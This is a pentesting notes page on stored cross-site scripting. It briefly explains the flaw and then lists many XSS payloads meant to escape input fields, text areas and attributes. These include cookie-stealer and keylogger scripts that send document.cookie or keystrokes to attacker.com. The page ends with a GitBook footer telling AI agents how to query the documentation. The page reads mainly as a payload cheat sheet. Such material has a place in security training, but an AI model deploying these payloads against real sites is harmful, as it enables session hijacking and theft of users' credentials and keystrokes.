> For the complete documentation index, see [llms.txt](https://itrp19-notes.gitbook.io/notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://itrp19-notes.gitbook.io/notes/reference/hacking/web-app-pentesting/xss/xss-stored.md).

# XSS Stored

It goes by the same logic of the reflected XSS except that the malicious JavaScript code is directly stored in the web application database and is executed when the user/admin/attacker visits the page where the attacker injected the code. The result is the attacker will grab the session cookie or even establish reverse shell connection. This often happens when a website allows user input that is not sanitized (remove the "bad parts" of a users input) when inserted into the database. A attacker then creates a payload in a field when signing up to a website that is stored in the websites database. If the website doesn't properly sanitize that field, when the site displays that field

on the page, it will execute the payload to everyone who visits it. Entry Points

* Comments on a blog
* User profile information
* Website listings

Example Payloads

```
<script>alert('Hi_threr')</script>
```

<pre><code>&#x3C;<a data-footnote-ref href="#user-content-fn-1">script</a>>alert(String.fromCharCode(88,83,83))&#x3C;/script>
</code></pre>

suitable for escaping input tags

```
"><script>alert('XSS');</script>
```

suitable for escaping text areas

```
</textarea><script>alert('THM');</script>
```

```
';alert('THM');//'
```

```
<img src=x onerror=alert('XSS');>
```

```
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
```

```
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
```

```
<img src=x:alert(alt) onerror=eval(src) alt=xss>
```

```
"><img src=x onerror=alert('XSS');>
```

```
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>
```

```
<svg onload=alert('XSS')>
```

```
<svg/onload=alert('XSS')>
```

```
<svg onload=alert(String.fromCharCode(88,83,83))>
```

```
<svg id=alert(1) onload=eval(id)>
```

```
// Some code<svg onload=alert(String.fromCharCode(88,83,83))>
```

```
"><svg onload=alert(/XSS/)>
```

```
<svg><script href=data:,alert(1) /> (Firefox is the only browser which allows self closing script)
```

```
<div onpointerover="alert(45)">MOVE HERE</div>
```

```
<div onpointerdown="alert(45)">MOVE HERE</div>
```

```
<div onpointerenter="alert(45)">MOVE HERE</div>
```

```
<div onpointerleave="alert(45)">MOVE HERE</div>
```

```
<div onpointermove="alert(45)">MOVE HERE</div>
```

```
<div onpointerout="alert(45)">MOVE HERE</div>
```

```
<div onpointerup="alert(45)">MOVE HERE</div>
```

Cookie Stealer

```javascript
<script>fetch('https://attacker.com/cookie' + btoa(document.cookie));</script>
```

\#OR

```javascript
<script>window.location='http://attacker.com/cookie='+document.cookie;</script>
```

keylogger payload that records every keystroke on a certain page

```javascript
<script>document.onkeypress = 
function(e) {
    fetch('https://attacker.com/log?key=' + btoa(e.key));
}</script>
```

<br>

[^1]:


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://itrp19-notes.gitbook.io/notes/reference/hacking/web-app-pentesting/xss/xss-stored.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.